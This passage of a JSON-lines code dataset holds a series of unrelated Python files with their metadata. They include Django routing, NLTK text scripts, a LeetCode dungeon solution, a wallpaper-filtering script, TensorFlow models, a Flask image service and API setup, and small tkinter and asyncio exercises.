{product_names} products\")\n # Consume generator and fetch YAML's\n dc = Datacube()\n added, failed = dump_list_to_odc(\n account_url,\n container_name,\n yaml_contents,\n dc,\n product_names,\n skip_lineage=skip_lineage,\n fail_on_missing_lineage=fail_on_missing_lineage,\n verify_lineage=verify_lineage\n )\n\n print(f\"Added {added} Datasets, Failed to add {failed} Datasets\")\n","sub_path":"apps/dc_tools/odc/apps/dc_tools/azure_to_dc.py","file_name":"azure_to_dc.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"369869505","text":"from django.urls import include, path\n\nfrom animals.urls import pets_router\nfrom baths.views import BathViewSet\n\napp_name = \"baths\"\n\npets_router.register(\n r\"baths\",\n BathViewSet,\n basename=\"baths\",\n)\n\nurlpatterns = [\n path(\"\", include(pets_router.urls)),\n]\n","sub_path":"src/baths/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"227089585","text":"import nltk\nimport codecs\nfrom itertools import tee, izip\nimport random\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = tee(iterable)\n next(b, None)\n return izip(a, b)\n\nimport networkx as nx\nG = nx.DiGraph()\n\nstart_words = set()\nend_words = set()\nwith codecs.open('atthemountainsofmadness', 'r', 'utf-8') as file1,\\\n codecs.open('thealchemist','r','utf-8') as file2:\n text = file1.read() + file2.read()\n sents = nltk.sent_tokenize(text)\n for sent in sents:\n words = nltk.word_tokenize(sent)\n if words and words[0] != '.':\n words = [\"\"] + words\n start_words.add(words[1])\n end_words.add(words[-1])\n G.add_edges_from(list(pairwise(words)))\n\n#print(start_words)\n#print(end_words)\n\nwhile True:\n n = raw_input(\"Show a sentence (Y/n)?\")\n if n.strip().upper() == 'N':\n break\n else:\n # naive random path\n start = random.choice(list(start_words))\n end = random.choice(list(end_words))\n paths = nx.all_simple_paths(G, source=start, target=end)\n # naive join\n print('\\n')\n print(' '.join(next(paths)))\n print('\\n')\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"167298634","text":"# The demons had captured the princess (P) and imprisoned her in the bottom-right corner of a dungeon. The dungeon consists of M x N rooms laid out in a 2D grid. Our valiant knight (K) was initially positioned in the top-left room and must fight his way through the dungeon to rescue the princess.\r\n#\r\n# The knight has an initial health point represented by a positive integer. If at any point his health point drops to 0 or below, he dies immediately.\r\n#\r\n# Some of the rooms are guarded by demons, so the knight loses health (negative integers) upon entering these rooms; other rooms are either empty (0's) or contain magic orbs that increase the knight's health (positive integers).\r\n#\r\n# In order to reach the princess as quickly as possible, the knight decides to move only rightward or downward in each step.\r\n#\r\n#\r\n# Write a function to determine the knight's minimum initial health so that he is able to rescue the princess.\r\n#\r\n# For example, given the dungeon below, the initial health of the knight must be at least 7 if he follows the optimal path RIGHT-> RIGHT -> DOWN -> DOWN.\r\n#\r\n# -2 (K)\t-3\t3\r\n# -5\t-10\t1\r\n# 10\t30\t-5 (P)\r\n#\r\n# Notes:\r\n#\r\n# The knight's health has no upper bound.\r\n# Any room can contain threats or power-ups, even the first room the knight enters and the bottom-right room where the princess is imprisoned.\r\nimport sys\r\n# todo interesting wrong solution\r\nclass Solution(object):\r\n def calculateMinimumHP1(self, dungeon):\r\n \"\"\"\r\n :type dungeon: List[List[int]]\r\n :rtype: int\r\n \"\"\"\r\n m = len(dungeon)\r\n n = 0\r\n if m > 0:\r\n n = len(dungeon[0])\r\n\r\n table = [0 for i in range(n)]\r\n result = [0 for i in range(n)]\r\n table[0] = dungeon[0][0]\r\n result[0] = dungeon[0][0]\r\n for i in range(1,n):\r\n table[i] = table[i-1] + dungeon[0][i]\r\n result[i] = min(result[i-1],table[i])\r\n for row in range(1,m):\r\n table[0] = table[0] + dungeon[row][0]\r\n result[0] = min(result[0],table[0])\r\n for i in range(1,n):\r\n if result[i] > result[i-1]:\r\n result[i] = result[i]\r\n table[i] = table[i] + dungeon[row][i]\r\n result[i] = min(result[i], table[i])\r\n else:\r\n result[i] = result[i-1]\r\n table[i] = table[i-1] + dungeon[row][i]\r\n result[i] = min(result[i], table[i])\r\n if result[n-1] > 0:\r\n return 1\r\n else:\r\n return 1-result[n-1]\r\n# \"\"\"\r\n# int calculateMinimumHP(vector > &dungeon) {\r\n#\r\n# if(dungeon.size()==0) return 0;\r\n#\r\n# int row=dungeon.size();\r\n# int col=dungeon[0].size();\r\n#\r\n# for(int i=row-1; i>=0; i--) {\r\n#\r\n# for(int j=col-1; j>=0; j--) {\r\n#\r\n# if(i==row-1 && j==col-1) dungeon[i][j]=max(1, 1-dungeon[i][j]);\r\n# else if(i==row-1) dungeon[i][j]=max(1, dungeon[i][j+1]-dungeon[i][j]);\r\n# else if(j==col-1) dungeon[i][j]=max(1, dungeon[i+1][j]-dungeon[i][j]);\r\n# else dungeon[i][j]=max(1, min(dungeon[i+1][j], dungeon[i][j+1])-dungeon[i][j]);\r\n# }\r\n# }\r\n#\r\n# return dungeon[0][0];\r\n# }\r\n# \"\"\"\r\n def calculateMinimumHP(self, dungeon):\r\n \"\"\"\r\n :type dungeon: List[List[int]]\r\n :rtype: int\r\n \"\"\"\r\n row = len(dungeon)\r\n col = 0\r\n if row > 0:\r\n col = len(dungeon[0])\r\n for i in range(row-1,-1,-1):\r\n for j in range(col-1,-1,-1):\r\n if i == row - 1 and j == col - 1:\r\n dungeon[i][j]=max(1, 1-dungeon[i][j])\r\n elif i == row-1:\r\n dungeon[i][j]=max(1, dungeon[i][j+1]-dungeon[i][j])\r\n elif j == col - 1:\r\n dungeon[i][j]=max(1, dungeon[i+1][j]-dungeon[i][j])\r\n else:\r\n dungeon[i][j]=max(1, min(dungeon[i+1][j], dungeon[i][j+1])-dungeon[i][j])\r\n return dungeon[0][0]\r\n\r\n\r\nhh = Solution()\r\ndungeon = [[1,-2,3],[2,-2,-2]]\r\nprint(hh.calculateMinimumHP(dungeon))","sub_path":"174. Dungeon Game.py","file_name":"174. Dungeon Game.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"428664377","text":"import os\nimport random\nimport string\nimport shutil\nfrom PIL import Image\nfrom PIL import ImageFile\nimport sys\n\nUSER_NAME = 'zc465'\nSRC_PATH = 'C:\\\\Users\\\\' + USER_NAME + '\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\\\LocalState\\\\Assets\\\\'\nPATH = 'E:\\\\壁纸'\nTARGET = 'E:\\\\图片\\\\壁纸\\\\'\nDELETE_STR = ''\nPIC_NUM = 0\n\n\ndef init():\n \"\"\"初始化工作目录和图片路径\"\"\"\n global USER_NAME, PATH, SRC_PATH\n\n # 手动输入用户名\n # if len(sys.argv) > 1: # sys.argv为命令行传入的参数\n # name = sys.argv[1]\n # else:\n # try:\n # name = input('Enter starting URL: ')\n # except (KeyboardInterrupt, EOFError):\n # name = ''\n # if not name:\n # name = USER_NAME\n # USER_NAME = name\n\n shutil.copytree(SRC_PATH, PATH) # 复制文件夹\n os.chdir(PATH) # 设置当前工作目录\n # print('Current working directory: ' + os.getcwd())\n # print(SRC_PATH)\n\n\ndef remove_brace():\n \"\"\"去除文件名中[]内的内容\"\"\"\n for filename in os.listdir('.'): # 遍历当前工作目录\n if ']' in filename:\n new_name = filename.split(']')[-1] # 取出最后一个]号后的字符串\n os.rename(filename, new_name) # 更改文件名\n print('Remove brace: ' + filename + ' -> ' + new_name)\n\n\ndef expand_name():\n \"\"\"设置拓展名\"\"\"\n global PIC_NUM\n for filename in os.listdir('.'): # 遍历当前工作目录\n if '.' not in filename and os.path.isfile(filename): # 是否是没有拓展名的文件\n new_name = ''\n for x in range(5): # 随机生成可重复的文件名\n new_name += random.choice(string.ascii_letters + string.digits)\n os.rename(filename, new_name + '.jpg') # 更改文件名\n PIC_NUM += 1\n # print('Expand names: ' + filename + ' -> ' + new_name + '.jpg')\n\n\ndef record_file():\n \"\"\"记录无效图片\"\"\"\n global DELETE_STR\n for filename in os.listdir('.'): # 遍历当前工作目录\n try:\n img = Image.open(filename)\n if img.width / img.height < 1.2 or img.width < 500: # 只保留宽图\n DELETE_STR += filename + '&' # 记录非宽图文件名\n img.close()\n except:\n if 'jpg' in filename:\n DELETE_STR += filename + '&' # 记录无效图片\n # print('Record csv_file: ' + filename)\n\n\ndef delete_file():\n \"\"\"删除记录的和重复的文件\"\"\"\n global DELETE_STR, PIC_NUM\n for filename in DELETE_STR.split('&'): # 删除所有记录的文件\n if 'jpg' in filename:\n os.remove(filename)\n PIC_NUM -= 1\n\n for tar in os.listdir(TARGET):\n for src in os.listdir('.'):\n if compare_image(src, TARGET + tar):\n os.remove(src)\n PIC_NUM -= 1\n continue\n\n\ndef compare_image(img_file1, img_file2):\n \"\"\"仅适用于完全相同的图片比较\"\"\"\n if img_file1 == img_file2:\n return True\n fp1 = open(img_file1, 'rb')\n fp2 = open(img_file2, 'rb')\n\n img1 = Image.open(fp1)\n img2 = Image.open(fp2)\n\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n b = img1 == img2\n\n fp1.close()\n fp2.close()\n\n return b\n\n\n# 若当前模块是直接运行,而不是导入的\nif __name__ == '__main__':\n init()\n remove_brace()\n expand_name()\n record_file()\n delete_file()\n print('Finished with %d pictures!' % PIC_NUM)\n","sub_path":"filter_pic.py","file_name":"filter_pic.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"451334418","text":"#! /usr/local/bin/python3\nimport sys\n\nlns = sorted(list(map(int, sys.stdin)))\n\nstartJolt = 0\ncurJolt = startJolt\ndeviceJolt = max(lns) + 3\nlns = [startJolt] + lns\nlns2 = lns[1:]\nlns2 += [deviceJolt]\n\ndiff = [b-a for a,b in zip(lns, lns2)]\nprint(diff)\n\njolt3 = diff.count(3)\njolt1 = diff.count(1)\n\nprint(jolt1, jolt3)\nprint(jolt1 * jolt3)\n","sub_path":"d10/d10.py","file_name":"d10.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"510468408","text":"import tensorflow as tf\nimport numpy as np\ntf.set_random_seed(777)\n\n# class 구조화\nclass Model():\n\n def __init__(self, sess):\n self.sess = sess\n\n # Neural network 구성\n def build_net(self):\n learning_rate = 0.001\n num_classes = 3\n\n # input placeholders\n self.X = tf.placeholder(tf.float32, shape=[None, 4])\n self.Y = tf.placeholder(tf.int32, shape=[None, 1]) # Iris 종류: 0-2의 총 3개 class\n Y_one_hot = tf.one_hot(self.Y, num_classes) # one hot 처리\n self.Y_one_hot = tf.reshape(Y_one_hot, [-1, num_classes])\n self.keep_prob = tf.placeholder(tf.float32)\n\n # layer 1\n W1 = tf.Variable(tf.random_normal([4, 12]), name=\"W1\")\n b1 = tf.Variable(tf.random_normal([12]))\n L1 = tf.nn.relu(tf.matmul(self.X, W1) + b1)\n L1 = tf.nn.dropout(L1, keep_prob=self.keep_prob)\n\n # layer 2\n W2 = tf.Variable(tf.random_normal([12, 12]), name=\"W2\")\n b2 = tf.Variable(tf.random_normal([12]))\n L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)\n L2 = tf.nn.dropout(L2, keep_prob=self.keep_prob)\n\n # layer 3\n W3 = tf.Variable(tf.random_normal([12, num_classes]), name=\"W3\")\n b3 = tf.Variable(tf.random_normal([num_classes]))\n self.hypothesis = tf.matmul(L2, W3) + b3\n\n self.sess.run(tf.initialize_all_variables())\n\n # cost, optimizer 정의\n cost_inner = tf.nn.softmax_cross_entropy_with_logits(logits=self.hypothesis,\n labels=self.Y_one_hot)\n\n self.cost = tf.reduce_mean(cost_inner)\n self.optimizer = tf.train.AdadeltaOptimizer(learning_rate=learning_rate).minimize(self.cost)\n\n is_equal = tf.equal(tf.arg_max(self.hypothesis, 1),\n tf.arg_max(self.Y_one_hot, 1))\n self.accuracy = tf.reduce_mean(tf.cast(is_equal, tf.float32))\n\n\n def training(self, x_data, y_data):\n return self.sess.run([self.cost, self.optimizer],\n feed_dict={self.X: x_data,\n self.Y: y_data,\n self.keep_prob:0.7})\n\n def predict(self, x_data):\n return self.sess.run(self.hypothesis, feed_dict={self.X: x_data,\n self.keep_prob:1.0})\n\n def get_accuracy(self, x_data, y_data):\n return self.sess.run(self.accuracy, feed_dict={self.X: x_data,\n self.Y: y_data,\n self.keep_prob:1.0})\n\ntraining_epoch = 15\n\n# 데이터 로딩, 셔플링\ndataXY = np.loadtxt('Iris.csv', delimiter=',', dtype=np.float32)\nnp.random.shuffle(dataXY)\n\n# XY 분리, column 재정리\ndataX = dataXY[:, :-1]\ndataY = dataXY[:, [-1]]\n\n# training set, test set 분리 (비율은 8:2)\ntrain_len = int(len(dataX) * 0.8)\ntrainX, testX = dataX[:train_len], dataX[train_len:]\ntrainY, testY = dataY[:train_len], dataY[train_len:]\n\nsess = tf.Session()\nmymodel = Model(sess)\n\n# building neural network\nmymodel.build_net()\n\n# training\nprint(\"Learning started\")\nfor epoch in range(training_epoch):\n c, _ = mymodel.training(trainX, trainY)\n print(\"Epoch:\", epoch, \" Cost:\", c)\nprint(\"Learning finished\")\n\n# get accuracy\nprint(\"Average accuracy:\", mymodel.get_accuracy(testX, testY))\n\n\n\n\n","sub_path":"TensorFlow/my-exercise/NN/NN_Iris-data_Class.py","file_name":"NN_Iris-data_Class.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"191134095","text":"from time import sleep\n\n\nclass Grid:\n \"\"\"\n Class to represent a grid\n \"\"\"\n\n def __init__(self, led_height=0, led_width=0, led_on='*', led_off=' '):\n \"\"\"\n Attrs:\n led_height: int\n led_width: int\n led_on: int\n led_off: int\n \"\"\"\n self.led_height = led_height\n self.led_width = led_width\n self.led_on = led_on\n self.led_off = led_off\n self.available_height = led_height - 2\n self.available_width = led_width - 2\n\n def create(self):\n \"\"\"\n Method to create a grid\n\n Returns:\n str, str, str\n \"\"\"\n top_wall = self.led_on * self.led_width\n side_walls = ''\n for _ in range(self.available_height):\n side_walls += self.led_on + self.led_off * self.available_width + self.led_on\n bottom_wall = self.led_on * self.led_width\n return top_wall, side_walls, bottom_wall\n\n def update(self, player):\n \"\"\"\n Method to handle update with each event where we re-draw\n grid with player's current position\n\n Params:\n player: object\n\n Returns:\n grid: str\n \"\"\"\n top_wall, side_walls, bottom_wall = self.create()\n grid = top_wall + side_walls + bottom_wall\n # Convert to a list so that the element can be mutable to add player char\n temp_grid = list(grid)\n # For each step in y, needs to increment by jumps of row width\n y_adjustment = (player.dy - 1) * self.led_width\n # The index position of player marker in the list-formatted grid\n position = self.led_width + player.dx + y_adjustment\n temp_grid[position] = self.led_on\n grid = ''\n grid = grid.join(temp_grid)\n return grid\n\n def display(self, np, grid_height, grid_width, led_count, process_grid):\n \"\"\"\n Method to display grid\n\n Params:\n np: object\n grid_height: int\n grid_width: int\n led_count: int\n process_grid: str\n \"\"\"\n black = (0, 0, 0)\n red = (64, 0, 0)\n green = (0, 64, 0)\n index = 0\n for pixel in range(len(process_grid)):\n led = process_grid[index]\n if led == self.led_on:\n # Turn on the wall led's of the top_wall+1 and the 1-bottom_wall\n if (0 <= index <= grid_width) or \\\n index >= (grid_width * grid_width - grid_width):\n np[index] = red\n else:\n # Turn on the player led at their current location\n np[index] = green\n for _ in range(2, grid_height):\n index_ = grid_height * _\n # Turn on the right wall led's\n np[index_ - 1] = red\n # Turn on the left wall led's less the top two\n np[index_] = red\n elif led == self.led_off:\n # Available movable space less the current player location\n np[index] = black\n else:\n pass\n if index < led_count-1:\n index += 1\n np.write()\n sleep(0.25)\n","sub_path":"Part_14_Classes/0007_escape_room/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"86146506","text":"import logging\nimport operator\nimport os\nimport threading\nfrom argparse import ArgumentParser\n\nfrom flask import Flask\n\nimport rest, processing\n\nAPP_NAME = \"imgproc\"\nAPP_AUTHOR = \"midnight coders\"\nAPP_VERSION = \"unknown\"\n\n\ndef main():\n def setup_logger(dbg):\n logLevel = logging.INFO\n logFormat = \"%(asctime)s [%(levelname)s] %(message)s\"\n\n if dbg:\n logLevel = logging.DEBUG\n logFormat = \"%(asctime)s [%(levelname)s] %(filename)s: %(message)s\"\n\n logging.basicConfig(level=logLevel, format=logFormat)\n\n def show_all_routes(server):\n \"\"\"Display registered routes\"\"\"\n rules = []\n for rule in server.url_map.iter_rules():\n methods = ','.join(sorted(rule.methods))\n rules.append((rule.endpoint, methods, str(rule)))\n\n logging.debug(\"listing routes:\")\n sort_by_rule = operator.itemgetter(2)\n for endpoint, methods, rule in sorted(rules, key=sort_by_rule):\n route = \" {:50s} {:25s} {}\".format(endpoint, methods, rule)\n logging.debug(route)\n\n # parsing cli flags\n parser = ArgumentParser(description=\"Image processing web-service\")\n parser.add_argument(\n \"--serviceurl\",\n help=\"url of this web-service in format \\\"http://:/\\\"\",\n default=os.environ.get(\"SERVICEURL\", None)\n )\n parser.add_argument(\n \"--dbg\",\n help=\"enable debug mode\",\n default=os.environ.get(\"DEBUG\", False)\n )\n\n args = parser.parse_args()\n if not args.serviceurl or len(args.serviceurl.split(':')) < 2:\n exit(parser.print_usage())\n\n service_url: str = args.serviceurl.split(':')[-2][2:]\n port: int = int(args.serviceurl.split(':')[-1][:-1])\n\n setup_logger(args.dbg)\n\n # flask initialization\n app = Flask(__name__)\n\n chroma_key_ctrl = rest.ChromaKeyController(processing.ChromaKeyServiceImpl())\n filtering_ctrl = rest.FilterController(processing.FilteringServiceImpl())\n\n app.register_blueprint(chroma_key_ctrl.blueprint)\n app.register_blueprint(filtering_ctrl.blueprint)\n\n show_all_routes(app)\n\n lock = threading.Lock()\n lock.acquire()\n app.run(host=service_url, port=port, debug=args.dbg, use_reloader=False)\n lock.release()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"imgproc/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"76264490","text":"from django import forms\n\nclass QAForm(forms.Form): \n\tdef __init__(self, *args, **kwargs):\n\t\tquestions = kwargs.pop('questions')\n\t\tsuper(QAForm, self).__init__(*args, **kwargs)\n\t\tcounter = 0\n\t\tfor q in questions:\n\t\t\tself.fields['question-' + str(counter)] = forms.CharField(label=q)\n\t\t\tcounter += 1\n\nclass OrderForm(forms.Form): \n\tzipcode = forms.CharField(max_length=100)","sub_path":"vanilla_milk_431/vanillamilk431/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"416235272","text":"import asyncio\n\nasync def outer():\n print(\"Now you are inside outer\")\n print(\"Waiting for result from phase 1\")\n result1 = await phase1()\n print(\"Waiting for result from phase 2\")\n result2 = await phase2(result1)\n return result1, result2\n\n\nasync def phase1():\n print(\"In phase1\")\n return \"result1\"\n\nasync def phase2(arg):\n print(\"In phase2\")\n return \"Result2 from {}\".format(arg)\n\nevent_loop = asyncio.get_event_loop()\n\ntry:\n return_value = event_loop.run_until_complete(outer())\n print('return value: {!r}'.format(return_value))\nfinally:\n event_loop.close()\n\n","sub_path":"tutorials-docs/pymotw/02_asyncio_coroutine_chain.py","file_name":"02_asyncio_coroutine_chain.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"9616613","text":"\"\"\"\nWrite a GUI-based program that provides two Entry fields, a button and a label. When the button is clicked, the value of each Entry should (if possible) be converted into a float. If both conversions succeed, the label should change to the sum of the two numbers. Otherwise it should read \"***ERROR***\".\n\"\"\"\n\n\nfrom tkinter import *\n\nclass Application(Frame):\n\n\n def __init__(self, master=None):\n Frame.__init__(self,master)\n self.pack()\n self.createWidgets()\n\n def createWidgets(self):\n topframe = Frame(self)\n self.top_num = Entry(topframe)\n self.bottom_num = Entry(topframe)\n self.label = Label(topframe, text= \"Output Label\")\n\n self.top_num.pack()\n self.bottom_num.pack()\n self.label.pack()\n topframe.pack(side=TOP)\n\n bottom_frame = Frame(self)\n bottom_frame.pack(side=BOTTOM)\n\n self.hand = Button( text=\"Calculate\", command = self.convert_to_float).pack()\n\n\n def convert_to_float(self):\n a = self.top_num.get()\n b = self.bottom_num.get()\n\n try:\n output = float(a) + float(b)\n except ValueError:\n output = \"***ERROR***\"\n\n self.label.config(text=output)\nroot = Tk()\napp = Application(master=root)\napp.mainloop()","sub_path":"Python/Python 2/P2 HW/GUI 1 hw.py","file_name":"GUI 1 hw.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"136300179","text":"import sys\nimport nltk\n\nif __name__==\"__main__\":\n\n # ファイルの読み込み\n f = open (sys.argv[1], \"r\")\n txt = f.read()\n\n # NLTK用のファイルを作成\n g = open (\"[top10_NLTK]\" + sys.argv[1], \"w\")\n\n # NLTKの文分割\n sentences = nltk.tokenize.sent_tokenize( txt )\n # NLTKの単語分割 with counting\n wordcount = {}\n for line in sentences:\n line = nltk.tokenize.word_tokenize( line )\n for word in line:\n wordcount[word] = wordcount.get(word, 0) + 1\n\n # soft by count\n d = [(v,k) for k,v in wordcount.items()]\n d.sort() # ソート\n d.reverse() # 逆順\n for count, word in d[:10]: # 上位10件を表示\n count = str(count) # カウント数を文字列に変換\n word = str(word) # 単語を文字列に変換\n g.write ( \" \" + count ) # カウント数を記入\n g.write ( \" \" + word + \"\\n\" ) # 単語を記入\n \n f.close() # ファイルを閉じる\n g.close() # ファイルを閉じる\n","sub_path":"freq_nltk.py","file_name":"freq_nltk.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"421846244","text":"# coding=utf-8\nimport logging\n\nfrom flask import Blueprint\n# from flask_restplus import Api\nfrom ..extensions.custom_api import CustomApi\nfrom ..extensions.exceptions import global_error_handler\n\n# Import all necesary API NameSpace here\n# from .user import ns as user_ns\nfrom .branch import ns as branch_ns\nfrom .location import ns as location_ns\nfrom .warehouse import ns as warehouse_ns\nfrom .srm_product import ns as srm_product_ns\nfrom .stock_quant import ns as stock_quant_ns\nfrom .stock_out import ns as stock_out_ns\nfrom .internal_api import ns as internal_api_ns\nfrom .eton_api import ns as eton_api_ns\n\n__author__ = 'ThucNC'\n_logger = logging.getLogger('api')\n\napi_wms = Blueprint('api', __name__, url_prefix='/api/v2')\n\ncustom_definition = {\n 'info': {\n 'x-logo': {\n 'url': 'https://teko-vn.github.io/api-docs/Teko-Logo-01.svg'\n }\n },\n}\n\napi = CustomApi(\n app=api_wms,\n version='1.0',\n title='Teko WMS API Specification',\n validate=False,\n description='This documentation describes APIs used in/exposed from Teko micro-services ecosystem \\\n # Introduction\\\n These specifications are following\\\n [OpenAPI 3.0.0 format](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.0.md).',\n license='Apache 2.0',\n license_url='http://www.apache.org/licenses/LICENSE-2.0.html',\n contact_email='son.lp@teko.vn'\n # doc='' # disable Swagger UI\n)\n\n# add custom definition\napi.add_custom_definition(custom_definition)\n\n\ndef init_app(app, **kwargs):\n \"\"\"\n :param flask.Flask app: the app\n :param kwargs:\n :return:\n \"\"\"\n # Add all necesary namespace here\n # api.add_namespace(user_ns)\n api.add_namespace(branch_ns, tag_group_name='WMS', path='/branches')\n api.add_namespace(warehouse_ns, tag_group_name='WMS', path='/warehouses')\n api.add_namespace(location_ns, tag_group_name='WMS', path='/locations')\n api.add_namespace(stock_quant_ns, tag_group_name='WMS', path='/stock_quants')\n api.add_namespace(stock_out_ns, tag_group_name='WMS', path='/stock_out')\n\n api.add_namespace(srm_product_ns, tag_group_name='SRM', path='/srm_products')\n api.add_namespace(internal_api_ns, tag_group_name='WMS', path='/internals')\n\n api.add_namespace(eton_api_ns, tag_group_name='WMS', path='/external')\n\n app.register_blueprint(api_wms)\n api.error_handlers[Exception] = global_error_handler\n","sub_path":"wms/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"83800750","text":"import tensorflow as tf\nimport datetime\nfrom tensorflow.python.framework import graph_util\nfrom face_ID_net.read_image import *\ndef face_net(batch_size,height, width, n_classes,learning_rate=0.001,margin=0.3,run_train=True):\n x = tf.placeholder(tf.float32, shape=[None, height, width, 3], name='input')\n def weight_variable(shape, name=\"weights\"):\n initial = tf.truncated_normal(shape, dtype=tf.float32, stddev=0.1)\n return tf.Variable(initial, name=name)\n\n def bias_variable(shape, name=\"biases\"):\n initial = tf.constant(0.1, dtype=tf.float32, shape=shape)\n return tf.Variable(initial, name=name)\n\n with tf.variable_scope('conv1') as scope:\n W1 = weight_variable([3, 3, 3, 32])\n b1 = bias_variable([32])\n conv = tf.nn.conv2d(x, W1, strides=[1, 1, 1, 1], padding=\"SAME\")\n pre_activation = tf.nn.bias_add(conv, b1)\n relu1 = tf.nn.relu(pre_activation, name=\"relu1\")\n\n with tf.variable_scope('conv2') as scope:\n W2 = weight_variable([3, 3, 32, 64])\n b2 = bias_variable([64])\n conv2 = tf.nn.conv2d(relu1, W2, strides=[1, 2, 2, 1], padding='SAME')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, b2), name='relu2')\n\n with tf.variable_scope('conv3') as scope:\n W3 = weight_variable([3, 3, 64, 128])\n b3 = bias_variable([128])\n conv3 = tf.nn.conv2d(relu2, W3, strides=[1, 1, 1, 1], padding='SAME')\n relu3 = tf.nn.relu(tf.nn.bias_add(conv3, b3), name='relu3')\n\n with tf.variable_scope('conv4') as scope:\n W4 = weight_variable([3, 3, 128, 256])\n b4 = bias_variable([256])\n conv4 = tf.nn.conv2d(relu3, W4, strides=[1, 2, 2, 1], padding='SAME')\n relu4 = tf.nn.relu(tf.nn.bias_add(conv4, b4), name='relu4')\n\n with tf.variable_scope('conv5') as scope:\n W5 = weight_variable([3, 3, 256, 512])\n b5 = bias_variable([512])\n conv5 = tf.nn.conv2d(relu4, W5, strides=[1, 1, 1, 1], padding='SAME')\n relu5 = tf.nn.relu(tf.nn.bias_add(conv5, b5), name='relu5')\n\n with tf.variable_scope('conv6') as scope:\n W6 = weight_variable([3, 3, 512, 1024])\n b6 = bias_variable([1024])\n conv6 = tf.nn.conv2d(relu5, W6, strides=[1, 1, 1, 1], padding='SAME')\n relu6 = tf.nn.relu(tf.nn.bias_add(conv6, b6), name='relu6')\n\n with tf.variable_scope('conv7') as scope:\n W7 = weight_variable([3, 3, 1024, 256])\n b7= bias_variable([256])\n conv7 = tf.nn.conv2d(relu6, W7, strides=[1, 1, 1, 1], padding='SAME')\n relu7 = tf.nn.relu(tf.nn.bias_add(conv7, b7), name='relu7')\n\n # 全连接层\n with tf.variable_scope(\"fc1\") as scope:\n dim = int(np.prod(relu7.get_shape()[1:]))\n reshape = tf.reshape(relu7, [-1, dim])\n print(\"看啊可能\",dim)\n weights1 =weight_variable([dim, 256]) ##24*24*256*256\n biases1 = bias_variable([256])\n fc1 = tf.nn.dropout(tf.nn.relu(tf.matmul(reshape, weights1) + biases1, name=\"fc1\"),0.5)\n\n with tf.variable_scope(\"fc2\") as scope:\n weights122 =weight_variable([256, 1024])\n biases122 = bias_variable([1024])\n fc2 = tf.nn.dropout(tf.nn.relu(tf.matmul(fc1, weights122) + biases122, name=\"fc2\"),0.5)\n\n with tf.variable_scope(\"output\") as scope:\n weights2 = weight_variable([1024, n_classes])\n biases2 = bias_variable([n_classes])\n y_conv=tf.add(tf.matmul(fc2, weights2),biases2, name=\"output\")\n\n if run_train==True:\n print('最后一层输出',y_conv)\n anchor_out = tf.slice(y_conv, [ 0, 0], [1, n_classes])\n positive_out = tf.slice(y_conv, [ 1, 0], [1, n_classes])\n negative_out = tf.slice(y_conv, [ 2, 0], [1, n_classes])\n d_pos = tf.norm(anchor_out - positive_out, axis=1)\n print('搞什么毛线d_pos', d_pos)\n # d_neg = tf.reduce_sum(tf.square(anchor_out - negative_out), 1)\n d_neg = tf.norm(anchor_out - negative_out, axis=1)\n loss = tf.maximum(0.0, margin + d_pos - d_neg)\n print('你这是干什么', loss)\n loss = tf.reduce_mean(loss)# + tf.reduce_mean(d_pos)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n train_op = optimizer.minimize(loss, global_step=global_step)\n return dict(\n x=x,\n loss=loss,\n optimize=train_op,\n d_pos=d_pos,\n d_neg=d_neg,\n )\n else:\n anchor_out = tf.slice(y_conv, [0, 0], [1,n_classes])\n return dict(\n x=x,\n anchor_out=anchor_out,\n )\n","sub_path":"face_ID_net/ID_pb_net.py","file_name":"ID_pb_net.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"101393750","text":"#@+leo-ver=5-thin\n#@+node:ekr.20160517182239.1: * @file ../../flake8-leo.py\n\"\"\"\nThis file runs flake8 on predefined lists of 